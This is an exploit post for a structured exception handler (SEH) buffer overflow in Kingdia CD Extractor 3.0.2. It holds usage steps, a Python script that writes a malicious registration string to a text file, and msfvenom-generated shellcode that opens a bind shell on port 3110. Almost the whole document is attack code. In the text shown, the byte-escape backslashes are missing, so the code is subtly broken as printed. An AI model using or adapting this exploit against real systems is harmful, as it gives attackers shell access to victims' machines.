Kingdia CD Extractor version 3.0.2 suffers from a SEH buffer overflow vulnerability.
# Exploit Title: Kingdia CD Extractor 3.0.2 - Buffer Overflow (SEH)
# Date: 31.10.2021
# Software Link: https://en.softonic.com/download/kingdia-cd-extractor/windows/post-download
# Exploit Author: Achilles
# Tested Version: 3.0.2
# Tested on: Windows 7 64bit
# 1.- Run python code : Kingdia.py
# 2.- Open EVIL.txt and copy All content to Clipboard
# 3.- Open Kingdia CD Extractor and press Register
# 4.- Paste the Content of EVIL.txt into the 'Name and Code Field'
# 5.- Click 'OK'
# 6.- Nc.exe Local IP Port 3110 and you will have a bind shell
# 7.- Greetings go:XiDreamzzXi,Metatron
#!/usr/bin/env python
import struct
buffer = "x41" * 256
nseh = "xEBx06x90x90" #jmp short 6
seh = struct.pack('<L',0x10037859) #SkinMagic.dll
nops = "x90" * 20
#msfvenom -p windows/shell_bind_tcp LPORT=3110 -f py -e x86/alpha_mixed E=
XITFUNC=thread -b "x00x0ax0d"
buf = b""
buf += b"x89xe0xdbxd9xd9x70xf4x59x49x49x49x49x49"
buf += b"x49x49x49x49x49x49x43x43x43x43x43x43x37"
buf += b"x51x5ax6ax41x58x50x30x41x30x41x6bx41x41"
buf += b"x51x32x41x42x32x42x42x30x42x42x41x42x58"
buf += b"x50x38x41x42x75x4ax49x49x6cx39x78x6cx42"
buf += b"x43x30x73x30x75x50x73x50x4ex69x58x65x70"
buf += b"x31x69x50x32x44x6cx4bx56x30x76x50x6ex6b"
buf += b"x31x42x34x4cx6ex6bx51x42x52x34x6cx4bx71"
buf += b"x62x75x78x36x6fx68x37x73x7ax74x66x65x61"
buf += b"x4bx4fx4cx6cx77x4cx70x61x61x6cx63x32x66"
buf += b"x4cx35x70x79x51x58x4fx54x4dx53x31x79x57"
buf += b"x6dx32x59x62x63x62x31x47x6cx4bx50x52x52"
buf += b"x30x4ex6bx53x7ax37x4cx4cx4bx72x6cx32x31"
buf += b"x51x68x58x63x52x68x56x61x4ex31x53x61x6e"
buf += b"x6bx70x59x37x50x53x31x4bx63x6cx4bx42x69"
buf += b"x57x68x58x63x75x6ax61x59x4cx4bx46x54x6e"
buf += b"x6bx63x31x39x46x34x71x39x6fx4cx6cx5ax61"
buf += b"x5ax6fx44x4dx65x51x59x57x54x78x4bx50x74"
buf += b"x35x4ax56x54x43x33x4dx49x68x37x4bx63x4d"
buf += b"x35x74x70x75x68x64x71x48x6ex6bx50x58x55"
buf += b"x74x46x61x78x53x70x66x4cx4bx74x4cx72x6b"
buf += b"x4ex6bx53x68x45x4cx45x51x38x53x6cx4bx75"
buf += b"x54x6ex6bx55x51x4ex30x4dx59x33x74x35x74"
buf += b"x45x74x43x6bx61x4bx51x71x63x69x63x6ax70"
buf += b"x51x4bx4fx6dx30x43x6fx31x4fx51x4ax4ex6b"
buf += b"x76x72x4ax4bx4cx4dx61x4dx73x58x64x73x57"
buf += b"x42x73x30x43x30x65x38x63x47x51x63x57x42"
buf += b"x61x4fx50x54x61x78x42x6cx33x47x56x46x54"
buf += b"x47x59x6fx59x45x48x38x6ax30x37x71x35x50"
buf += b"x57x70x77x59x6fx34x33x64x32x70x70x68x35"
buf += b"x79x4bx30x32x4bx55x50x79x6fx39x45x43x5a"
buf += b"x47x78x53x69x50x50x58x62x59x6dx51x50x42"
buf += b"x70x31x50x30x50x55x38x48x6ax66x6fx49x4f"
buf += b"x79x70x39x6fx78x55x6dx47x42x48x57x72x37"
buf += b"x70x76x6cx54x66x4bx39x6bx56x63x5ax46x70"
buf += b"x72x76x51x47x55x38x68x42x4bx6bx77x47x75"
buf += b"x37x79x6fx7ax75x43x67x50x68x4cx77x6dx39"
buf += b"x76x58x49x6fx79x6fx69x45x66x37x63x58x33"
buf += b"x44x78x6cx47x4bx38x61x49x6fx39x45x51x47"
buf += b"x6fx67x50x68x42x55x62x4ex50x4dx35x31x69"
buf += b"x6fx38x55x43x58x45x33x62x4dx71x74x35x50"
buf += b"x6bx39x49x73x46x37x50x57x52x77x75x61x58"
buf += b"x76x33x5ax34x52x63x69x33x66x58x62x4bx4d"
buf += b"x73x56x6fx37x77x34x55x74x45x6cx46x61x66"
buf += b"x61x6ex6dx42x64x36x44x54x50x6fx36x63x30"
buf += b"x63x74x36x34x42x70x62x76x72x76x36x36x33"
buf += b"x76x46x36x50x4ex66x36x43x66x30x53x43x66"
buf += b"x71x78x44x39x58x4cx47x4fx4cx46x79x6fx79"
buf += b"x45x4ex69x79x70x62x6ex62x76x57x36x6bx4f"
buf += b"x34x70x30x68x77x78x6bx37x55x4dx33x50x69"
buf += b"x6fx48x55x6dx6bx69x70x67x6dx55x7ax54x4a"
buf += b"x52x48x39x36x4cx55x6fx4dx6dx4dx6bx4fx49"
buf += b"x45x67x4cx34x46x71x6cx37x7ax4bx30x39x6b"
buf += b"x59x70x50x75x73x35x4fx4bx61x57x47x63x61"
buf += b"x62x52x4fx33x5ax55x50x76x33x6bx4fx49x45"
buf += b"x41x41"
pad ="B" * (7736 - len(buffer) - len(nseh+seh) - len(nops) -len(buf))
payload = buffer + nseh + seh + nops + buf + pad
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
